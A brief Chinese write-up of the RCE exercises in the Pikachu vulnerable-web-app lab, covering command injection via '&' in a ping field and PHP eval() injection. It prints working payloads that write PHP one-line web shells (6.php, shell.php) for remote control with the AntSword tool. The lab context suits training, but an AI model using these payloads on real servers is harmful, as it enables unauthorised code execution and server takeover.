Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
国冶机电安装9 分钟前
粉尘输送管道工程:工业粉体输送系统设计、安装与运维全解析
运维
南境十里·墨染春水17 分钟前
Linux学习进展 进程管理命令 及文件压缩解压
linux·运维·笔记·学习
zhyoobo18 分钟前
Nginx Gzip压缩全解析:原理、配置与性能优化指南
运维·nginx·性能优化
深圳市智易付科技有限责任公司19 分钟前
Kubernetes中部署Dependency-Track 并对接 EAuth OIDC 认证
安全
CDN36020 分钟前
游戏盾与支付 / 广告 SDK 冲突:依赖顺序与隔离方案(踩坑实录)
运维·游戏·网络安全
航Hang*24 分钟前
第2章:进阶Linux系统——第4节:配置与管理NFS服务器
linux·运维·服务器·笔记·学习·vmware
赵侃侃爱分享34 分钟前
AI怎么定义网络安全
人工智能·安全·web安全
步步为营DotNet40 分钟前
深度探索.NET Aspire在云原生应用性能与安全加固的创新实践
安全·云原生·.net
科技小花1 小时前
AI重塑与全球合规:2026年主流数据治理平台差异化解析
大数据·运维·人工智能·数据治理
wjp@0011 小时前
SQL server导出导入数据
运维·服务器·数据库